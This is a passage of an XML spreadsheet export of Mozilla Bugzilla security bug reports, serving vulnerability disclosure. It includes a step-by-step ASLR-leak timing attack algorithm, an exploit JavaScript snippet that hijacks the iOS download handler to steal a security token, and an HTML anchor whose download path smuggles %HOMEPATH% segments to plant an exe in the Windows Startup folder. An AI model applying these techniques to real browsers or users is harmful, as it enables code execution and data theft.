          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6086" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K6086" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6086" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6086" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6086" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6086" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6086" t="inlineStr">
        <is>
          <t>[sg:high][qa+] several comments describe bug 745254, keep hidden until that's fixed</t>
        </is>
      </c>
      <c r="Q6086" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6086" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6086" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T6086" t="n">
        <v>1</v>
      </c>
      <c r="U6086" t="n">
        <v>0</v>
      </c>
      <c r="V6086" t="n">
        <v>46</v>
      </c>
      <c r="W6086" t="inlineStr">
        <is>
          <t>Created attachment 585285
Proof of concept
User Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Build ID: 20111220165912
Steps to reproduce:
I created a test phishing page. At the bottom of it, I put a small piece of JavaScript that redirects to an HTTPS Twitter API page that replies with an HTTP error code and XML content. I then opened the test phishing page in Firefox.
(The exact HTTP error code does not seem to matter; it works at least with 404 and 500. On the other hand, the XML content in the HTTP error body seems to be necessary.)
Actual results:
The certificate of the HTTPS error page is now shown on my phishing page.
Expected results:
The error from Twitter should be displayed and the address in the address bar should indicate the address of the error page.</t>
        </is>
      </c>
      <c r="X6086" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6087">
      <c r="A6087" t="n">
        <v>1092339</v>
      </c>
      <c r="B6087" t="inlineStr">
        <is>
          <t>2014-10-31 13:45:06 -0700</t>
        </is>
      </c>
      <c r="C6087" t="inlineStr">
        <is>
          <t>Logviewer: Log chunks fail to load on loadMore() due to Angular 1.3 update</t>
        </is>
      </c>
      <c r="D6087" t="inlineStr">
        <is>
          <t>2015-05-20 04:29:25 -0700</t>
        </is>
      </c>
      <c r="E6087" t="n">
        <v>1</v>
      </c>
      <c r="F6087" t="n">
        <v>1</v>
      </c>
      <c r="G6087" t="n">
        <v>7</v>
      </c>
      <c r="H6087" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6087" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6087" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6087" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6087" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6087" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6087" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6087" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6087" t="inlineStr"/>
      <c r="Q6087" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6087" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6087" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6087" t="n">
        <v>1</v>
      </c>
      <c r="U6087" t="n">
        <v>0</v>
      </c>
      <c r="V6087" t="n">
        <v>5</v>
      </c>
      <c r="W6087" t="inlineStr">
        <is>
          <t>Log chunks fail to load in the logviewer on scroll. To reproduce:
o click on any job
o open the logviewer
o click on any failure step to load the log
o page down/up or scroll, to trigger a new log chunk load
Expected:
A new log chunk loads.
Observed:
Nothing occurs and this error is sent to the console:
"Error: [$parse:isecdom] Referencing DOM nodes in Angular expressions is disallowed! Expression: loadMore(bounds, element)".
Cameron is having a look. The relevant part is here in the Angular 1.3 docs
https://docs.angularjs.org/error/$parse/isecdom</t>
        </is>
      </c>
      <c r="X6087" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6088">
      <c r="A6088" t="n">
        <v>1312001</v>
      </c>
      <c r="B6088" t="inlineStr">
        <is>
          <t>2016-10-21 06:59:06 -0700</t>
        </is>
      </c>
      <c r="C6088" t="inlineStr">
        <is>
          <t>ASLR leak and cross-frame oracle via pointer scrambling in Map/Set</t>
        </is>
      </c>
      <c r="D6088" t="inlineStr">
        <is>
          <t>2017-10-26 18:58:27 -0700</t>
        </is>
      </c>
      <c r="E6088" t="n">
        <v>1</v>
      </c>
      <c r="F6088" t="n">
        <v>1</v>
      </c>
      <c r="G6088" t="n">
        <v>3</v>
      </c>
      <c r="H6088" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6088" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6088" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6088" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6088" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6088" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6088" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+] Disclosure date ~Jan 21 2017 (note Fx51 scheduled for Jan 24)</t>
        </is>
      </c>
      <c r="Q6088" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6088" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6088" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T6088" t="n">
        <v>1</v>
      </c>
      <c r="U6088" t="n">
        <v>0</v>
      </c>
      <c r="V6088" t="n">
        <v>76</v>
      </c>
      <c r="W6088" t="inlineStr">
        <is>
          <t>Created attachment 8803341
firefox-aslr-break.tar
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Steps to reproduce:
In Nightly (non-debug build) on x86-64, open the file attack.html from the attached tarball and wait around 15 seconds (depending on your CPU) until the displayed result is green or red.
For the second way to abuse the behavior described here, unpack leak_interned.html, an attacker, and leak_interned_victim.html, a victim page. This attack is less reliable. Open leak_interned.html in a fresh browser instance, click one of the three name buttons, click the "tell me what I clicked button", and then wait a couple seconds (I think you have to wait for a GC run to happen or so).
Actual results:
In the first PoC, something like this will be shown:
bucket access delay calibration: hit: 0.014999999999993463, miss: 0, limit: 0.0074999999999967315
current char code: 41
number of possible results: 1
result: 0x01f00028
The displayed result (0x01f00028) is the pointer to the atomized string corresponding to '\0', truncated to 32 bits. On Linux, the corresponding mapping is visible in /proc/&lt;plugin-container-pid&gt;/maps:
7f3001400000-7f3002000000 rw-p 00000000 00:00 0 
The basic idea here is to perform a hash DoS attack, but with a goal other than Denial of Service. After a single hashtable bucket has been filled with lots of entries, insertions and negative lookups on the hashtable will be much slower for keys that map to the filled hashmap bucket. This means that a timing measurement can be used to determine whether a given key maps to a specific hashtable bucket as follows:
 - Fill the hashtable bucket with data.
 - Measure the time needed to look up the key in the hashtable.
Filling a specific hashtable bucket with data is easy because:
 - int32 numbers are simply mapped with ScrambleHashCode(number),
   no unknown values are involved
 - the inverse of ScrambleHashCode() is just a modular multiplication with
   the multiplicative inverse of the constant scrambling factor, so it is possible
   to compute a series of int32 numbers that map to adjacent hash codes.
The reason this can be used to break ASLR is that, for strings and objects, 32-bit truncated pointers are scrambled with ScrambleHashCode() and then used to derive hashmap bucket indexes. Therefore, by measuring lookup times for strings/objects in a hashmap with a known filled bucket, the range of possible pointers can be constrained.
Strings are converted to pointers by atomizing (interning) them, then taking the pointer to the atom. For some strings, atoms are precreated; in particular, atoms exist for single-character strings with charcodes 0-255. Because these are allocated in a loop during runtime initialization (StaticStrings::init()), they form a sequence in memory, so the distance between the atomized strings for String.fromCharCode(i) and String.fromCharCode(i+1) (for i in range(0,255)) is always 0x18.
The algorithm used in the PoC works roughly as follows (this is just the basic idea, the implementation in the exploit is optimized a bit):
find_bucket_precise() attempts to find the bucket index at which a given value will be placed in a Set of size 2^22.
This is done as follows:
 - Locate the value in a Set with 64 buckets (find_bucket64()) by testing with 64 different
   Set instances that have different filled buckets and checking with which Set the operation is slow
 - Repeatedly create new Sets with doubled bucket counts (128, 256, 512, ...) and test
   whether the access at the doubled old bucket index is slow. Basically, determine the 22-bit bucket index
   bit by bit.
The main code attempts to find a single candidate for the address of the '\0' atom:
 - Compute the bucket index of '\0' with find_bucket_precise().
 - Let candidates_set be the result of deriving 32-bit truncated pointer candidates
   from the bucket index of '\0' using the inverse of ScrambleHashCode().
 - For characters '\1', '\2', '\3', ...:
   - Compute the character's bucket index with find_bucket_precise().
   - Derive 32-bit truncated pointer candidates from the character's bucket index.
   - Let current_0candidates be the result of subtracting character_code*0x18
     from the candidates for the current character.
   - Let candidates_set be the values that are contained in both candidates_set
     and current_0candidates.
 - Assert that candidates_set contains exactly one value.
 - Return the value in candidates_set.
This is not just usable to break ASLR, as demonstrated by the second PoC. Another issue is that, because atoms are shared across frames, the ability to determine bucket indexes can be used to determine whether another frame is using an atom with specific contents (because an atom can only move in memory if nobody is using it). I'm not entirely sure, but I think string literals are always atomized? So this can e.g. be used to leak information like usernames embedded in JavaScript code across websites. The PoC determines which one out of a set of possible names was selected in the other frame across origins.
Expected results:
Firefox should not leak addresses or information about strings in other frames to JavaScript code.
In V8, these attacks won't work because:
Objects can have private, random 32-bit members ("hash_code_symbol") specifying their hashmap buckets. The member is set when the object is used in a hashtable the first time.
Strings are not interned for usage in hashtables; instead, when a string is used in a hashtable for the first time, a hash of its contents is computed and stored in the string by String::ComputeAndSetHash().
It might make sense to copy V8's behavior here.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, I will post it publicly.</t>
        </is>
      </c>
      <c r="X6088" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6089">
      <c r="A6089" t="n">
        <v>1072044</v>
      </c>
      <c r="B6089" t="inlineStr">
        <is>
          <t>2014-09-23 17:13:15 -0700</t>
        </is>
      </c>
      <c r="C6089" t="inlineStr">
        <is>
          <t>Several signals from PCMedia to PCImpl are unsafe</t>
        </is>
      </c>
      <c r="D6089" t="inlineStr">
        <is>
          <t>2016-06-04 16:00:59 -0700</t>
        </is>
      </c>
      <c r="E6089" t="n">
        <v>1</v>
      </c>
      <c r="F6089" t="n">
        <v>1</v>
      </c>
      <c r="G6089" t="n">
        <v>3</v>
      </c>
      <c r="H6089" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6089" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6089" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K6089" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6089" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6089" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6089" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6089" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6089" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+]</t>
        </is>
      </c>
      <c r="Q6089" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6089" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6089" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T6089" t="n">
        <v>1</v>
      </c>
      <c r="U6089" t="n">
        <v>0</v>
      </c>
      <c r="V6089" t="n">
        <v>40</v>
      </c>
      <c r="W6089" t="inlineStr">
        <is>
          <t>None of the following signal handlers are torn down in a safe way right now:
http://dxr.mozilla.org/mozilla-central/source/media/webrtc/signaling/src/peerconnection/PeerConnectionImpl.cpp#614
The PC is (usually, it is racy) destroyed before the PCMedia, which still has these slots connected when the PC dies. If anything from the ICE layer happens between the PCImpl dying, and the PCMedia dying, the signal results in a UAF.</t>
        </is>
      </c>
      <c r="X6089" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6090">
      <c r="A6090" t="n">
        <v>1653827</v>
      </c>
      <c r="B6090" t="inlineStr">
        <is>
          <t>2020-07-19 00:02:35 -0700</t>
        </is>
      </c>
      <c r="C6090" t="inlineStr">
        <is>
          <t>Rogue download handler can be injected by any web contents</t>
        </is>
      </c>
      <c r="D6090" t="inlineStr">
        <is>
          <t>2024-05-30 10:16:50 -0700</t>
        </is>
      </c>
      <c r="E6090" t="n">
        <v>1</v>
      </c>
      <c r="F6090" t="n">
        <v>1</v>
      </c>
      <c r="G6090" t="n">
        <v>2</v>
      </c>
      <c r="H6090" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6090" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6090" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K6090" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6090" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6090" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6090" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6090" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6090" t="inlineStr">
        <is>
          <t>[sec-survey]</t>
        </is>
      </c>
      <c r="Q6090" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6090" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6090" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6090" t="n">
        <v>1</v>
      </c>
      <c r="U6090" t="n">
        <v>0</v>
      </c>
      <c r="V6090" t="n">
        <v>12</v>
      </c>
      <c r="W6090" t="inlineStr">
        <is>
          <t>Created attachment 9164587
Demo cross_origin_data_leakage (Example A)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Steps to reproduce:
Any web content can define rogue download handler (window.__firefox__.download).
That can be a cause of several security issue.
Example (A). Cross Origin URL Leakage
(1) Victim visits http://csrf.jp/2020/download_handler_injection_cross_origin_data_leakage.html .
    This page has an &lt;iframe&gt; that shows CERN's website (info.cern.ch).
(2) Victim long taps a hyperlink in the CERN's page and choose "Download Link" from context menu.
(3) Parent frame (csrf.jp) shows the URL that Victim tries to download in &lt;iframe&gt;.
Example (B). Security Token Leakage
At first, Firefox for iOS uses Security Token to identify that privileged JS bridge is called from browser frame (but not from web contents). If the Token is leaked, any web contents can abuse browser feature, e.g., disabling Tracking Protection.
(1) Victim visits http://csrf.jp/2020/download_handler_injection_security_token_leakage.html
(2) Victim long taps a hyperlink "Download Juicy Content Here".
    Then the leaked Security Token is shown in the page.
(3) Push "Disable Tracking Protection by abusing securityToken" button in the page.
    Then Tracking Protection is disabled for csrf.jp.
(4) In order to check if the protection is really off, push "Show window.fetch object" button.
    If the protection is on, window.fetch object should be the following function code because Tracking Protection overrides the navive fetch() function.
    https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/content-blocker-lib-ios/js/TrackingProtectionStats.js#L132
    But if the protection is disabled, window.fetch object shows [native code].
Actual results:
The reason why legitimate download handler is changed is that DownloadHelper.js is injected at the timing of AtDocumentEnd.
https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/Client/Frontend/UserContent/UserScripts/AllFrames/AtDocumentEnd/DownloadHelper.js#L8
WKWebView's JS hook lifecycle is below.
[1] AtDocumentStart -&gt; [2] Load web document -&gt; [3] AtDocumentEnd
The exploit code below is executed at [2] and then define the handler as an immutable object. So the setting of legitimate handler at [3] is rejected.
```
Object.defineProperty(window.__firefox__, "download", {
  enumerable: true,
  configurable: true,
  writable: false,
  value: function(url, securityToken) {
    window.securityToken = securityToken
  }
});
```
Expected results:
The legitimate download handler (window.__firefox__.download) should be set at [1] AtDocumentStart.</t>
        </is>
      </c>
      <c r="X6090" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6091">
      <c r="A6091" t="n">
        <v>1048517</v>
      </c>
      <c r="B6091" t="inlineStr">
        <is>
          <t>2014-08-04 13:47:33 -0700</t>
        </is>
      </c>
      <c r="C6091" t="inlineStr">
        <is>
          <t>[libstagefright] |MPEG4Source::read| has several potential uninitialized variable errors</t>
        </is>
      </c>
      <c r="D6091" t="inlineStr">
        <is>
          <t>2018-07-06 11:26:13 -0700</t>
        </is>
      </c>
      <c r="E6091" t="n">
        <v>1</v>
      </c>
      <c r="F6091" t="n">
        <v>1</v>
      </c>
      <c r="G6091" t="n">
        <v>3</v>
      </c>
      <c r="H6091" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6091" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6091" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K6091" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6091" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6091" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6091" t="inlineStr">
        <is>
          <t>[CID 1221246] [CID 1221247] [CID 1221248] [CID 1221249] [CID 1221250] [CID 1225496][adv-main34+]</t>
        </is>
      </c>
      <c r="Q6091" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6091" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6091" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T6091" t="n">
        <v>1</v>
      </c>
      <c r="U6091" t="n">
        <v>0</v>
      </c>
      <c r="V6091" t="n">
        <v>11</v>
      </c>
      <c r="W6091" t="inlineStr">
        <is>
          <t>Coverity has flagged at least five potential uninitialized variable issues in |MPEG4Source::read| [1].
#1 - |offset| can be used uninitialized in buffer reads [2],[3]
#2 - |size| can be used uninitialized in buffer reads [2],[3]
#3 - |cts| can be used uninitialized when setting buffer metadata [4]
#4 - |duration| can be used uninitialized when setting buffer metadata [5]
#5 - |isSyncSample| can be used uninitialized in an if statement [6]
I will attach the Coverity analysis as well, it's somewhat convoluted but generally the issues arise if we take the false branch of |if (!mIsAVC || mWantsNALFragments)| [7].
[1] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3079
[2] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3288
[3] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3290
[4] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3349
[5] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3351
[6] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3358
[7] - http://hg.mozilla.org/mozilla-central/annotate/71497ed2e0db/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l3280</t>
        </is>
      </c>
      <c r="X6091" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6092">
      <c r="A6092" t="n">
        <v>1000598</v>
      </c>
      <c r="B6092" t="inlineStr">
        <is>
          <t>2014-04-23 16:40:29 -0700</t>
        </is>
      </c>
      <c r="C6092" t="inlineStr">
        <is>
          <t>Use after free JS_ASSERT(arenaHeader()-&gt;allocated());</t>
        </is>
      </c>
      <c r="D6092" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:58 -0700</t>
        </is>
      </c>
      <c r="E6092" t="n">
        <v>1</v>
      </c>
      <c r="F6092" t="n">
        <v>1</v>
      </c>
      <c r="G6092" t="n">
        <v>3</v>
      </c>
      <c r="H6092" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6092" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6092" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K6092" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6092" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6092" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6092" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6092" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6092" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q6092" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6092" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6092" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T6092" t="n">
        <v>1</v>
      </c>
      <c r="U6092" t="n">
        <v>0</v>
      </c>
      <c r="V6092" t="n">
        <v>35</v>
      </c>
      <c r="W6092" t="inlineStr">
        <is>
          <t>Seen on nexus 4 with debug gecko and current trunk.
STR:
Go to maps.google.com
press GPS icon a few times and keep zooming and moving around
Program received signal SIGSEGV, Segmentation fault.
0xb5e56b56 in js::gc::Cell::isMarked (color=&lt;optimized out&gt;, this=&lt;optimized out&gt;) at ../../../js/src/gc/Heap.h:1018
1018	    JS_ASSERT(arenaHeader()-&gt;allocated());
(gdb) bt
#0  0xb5e56b56 in js::gc::Cell::isMarked (color=&lt;optimized out&gt;, this=&lt;optimized out&gt;) at ../../../js/src/gc/Heap.h:1018
#1  0xb5e5722e in js::gc::Cell::isMarked (this=0xb0684440, color=0) at ../../../js/src/gc/Heap.h:1021
#2  0xb5e5746a in js::gc::IsAboutToBeFinalized&lt;js::UnownedBaseShape&gt; (thingp=&lt;optimized out&gt;) at ../../../js/src/gc/Marking.cpp:388
#3  0xb5fe9cc6 in js::types::TypeCompartment::sweep (this=0xb0984834, fop=&lt;optimized out&gt;) at ../../../js/src/jsinfer.cpp:4166
#4  0xb5fea894 in js::types::TypeZone::sweep (this=0xb0983694, fop=0xbeb836b8, releaseTypes=&lt;optimized out&gt;, oom=0xbeb83677) at ../../../js/src/jsinfer.cpp:4425
#5  0xb5e6ccc2 in JS::Zone::sweep (this=0xb0983400, fop=0xbeb836b8, releaseTypes=false, oom=0xbeb83677) at ../../../js/src/gc/Zone.cpp:119
#6  0xb5fd891e in BeginSweepingZoneGroup (rt=0xb31e4000) at ../../../js/src/jsgc.cpp:3718
#7  0xb5fda0d4 in BeginSweepPhase (rt=0xb31e4000, lastGC=&lt;optimized out&gt;) at ../../../js/src/jsgc.cpp:3822
#8  0xb5fdb7ba in IncrementalCollectSlice (rt=0xb31e4000, budget=&lt;optimized out&gt;, reason=JS::gcreason::ALLOC_TRIGGER, gckind=js::GC_NORMAL) at ../../../js/src/jsgc.cpp:4428
#9  0xb5fdbc92 in GCCycle (rt=0xb31e4000, incremental=&lt;optimized out&gt;, budget=0, gckind=js::GC_NORMAL, reason=JS::gcreason::ALLOC_TRIGGER) at ../../../js/src/jsgc.cpp:4564
#10 0xb5fdbff0 in Collect (rt=0xb31e4000, incremental=&lt;optimized out&gt;, budget=30000, gckind=js::GC_NORMAL, reason=JS::gcreason::ALLOC_TRIGGER) at ../../../js/src/jsgc.cpp:4697
#11 0xb5fdc296 in js::gc::GCIfNeeded (cx=&lt;optimized out&gt;) at ../../../js/src/jsgc.cpp:4840
#12 0xb5fa2aca in js::InvokeInterruptCallback (cx=0xb3cbec60) at ../../../js/src/jscntxt.cpp:1020
#13 0xb3d62d2c in ?? ()
#14 0xb3d62d2c in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) f 3
#3  0xb5fe9cc6 in js::types::TypeCompartment::sweep (this=0xb0984834, fop=&lt;optimized out&gt;) at ../../../js/src/jsinfer.cpp:4166
4166	                if (IsTypeObjectAboutToBeFinalized(&amp;typeObject))
(gdb) p typeObject
$5 = (js::types::TypeObject *) 0xb0684440
(gdb) p *typeObject
$6 = {&lt;js::gc::BarrieredCell&lt;js::types::TypeObject&gt;&gt; = {&lt;js::gc::Cell&gt; = {&lt;No data fields&gt;}, &lt;No data fields&gt;}, clasp_ = 0x4b4b4b4b, 
  proto_ = {&lt;js::BarrieredPtr&lt;JSObject, unsigned int&gt;&gt; = {{value = 0x4b4b4b4b, other = 1263225675}}, &lt;No data fields&gt;}, 
  singleton_ = {&lt;js::BarrieredPtr&lt;JSObject, unsigned int&gt;&gt; = {{value = 0x4b4b4b4b, other = 1263225675}}, &lt;No data fields&gt;}, static LAZY_SINGLETON = 1, flags_ = 1263225675, 
  addendum = {&lt;js::BarrieredPtr&lt;js::types::TypeObjectAddendum, unsigned int&gt;&gt; = {{value = 0x4b4b4b4b, other = 1263225675}}, &lt;No data fields&gt;}, propertySet = 0x4b4b4b4b, 
  interpretedFunction = {&lt;js::BarrieredPtr&lt;JSFunction, unsigned int&gt;&gt; = {{value = 0x4b4b4b4b, other = 1263225675}}, &lt;No data fields&gt;}, padding = 1263225675}</t>
        </is>
      </c>
      <c r="X6092" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6093">
      <c r="A6093" t="n">
        <v>1765049</v>
      </c>
      <c r="B6093" t="inlineStr">
        <is>
          <t>2022-04-16 08:15:55 -0700</t>
        </is>
      </c>
      <c r="C6093" t="inlineStr">
        <is>
          <t>Possible download files like exe to user Startup folder on windows, which may cause RCE</t>
        </is>
      </c>
      <c r="D6093" t="inlineStr">
        <is>
          <t>2024-05-30 10:55:40 -0700</t>
        </is>
      </c>
      <c r="E6093" t="n">
        <v>1</v>
      </c>
      <c r="F6093" t="n">
        <v>1</v>
      </c>
      <c r="G6093" t="n">
        <v>2</v>
      </c>
      <c r="H6093" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6093" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6093" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K6093" t="inlineStr">
        <is>
          <t>Firefox 99</t>
        </is>
      </c>
      <c r="L6093" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M6093" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N6093" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6093" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6093" t="inlineStr">
        <is>
          <t>[adv-main101+][adv-esr91.10+]</t>
        </is>
      </c>
      <c r="Q6093" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6093" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S6093" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T6093" t="n">
        <v>1</v>
      </c>
      <c r="U6093" t="n">
        <v>0</v>
      </c>
      <c r="V6093" t="n">
        <v>44</v>
      </c>
      <c r="W6093" t="inlineStr">
        <is>
          <t>Steps to reproduce:
Pre Requirements:
1. Settings → Files and Applications → Downloads → “Always ask you where to save files” is checked
2. Environment Variable: %HOMEPATH% resolves to \ . See link: https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/variables-resolved-incorrectly , when user's home folder is on a DfS share, %HOMEPATH% should resolve to \. Besides that, in some companies, IT department will configure their employee’s computer home directory to a network driver, which will also result in %HOMEPATH% resolving to \. See link:
    1. https://superuser.com/questions/255776/overriding-homedrive-and-homepath-as-a-windows-7-user/
    2. https://superuser.com/questions/246731/how-do-i-change-homedrive-homepath-and-homeshare-in-windows-xp
    3. https://stackoverflow.com/questions/40077826/windows-10-system-environment-variable-path-back-slash-meaning
    4. ...
Steps:
1. Run the app.py: python app.py. Note: I didn't attach calc.exe in the attached file: firefox-startup-poc.zip 
2. Visit the http://127.0.0.1:5000/, by holding for 2 seconds ENTER button on the website, the hacker can trick the user download a file like exe to his Startup folder, which will lead to RCE when system reboot.
Details:
&lt;a id="link" href="/poc.exe" download="%APPDATA%%HOMEPATH%Microsoft%HOMEPATH%Windows%HOMEPATH%Start Menu%HOMEPATH%Programs%HOMEPATH%Startup%HOMEPATH%poc.exe"&gt;POC&lt;/a&gt;
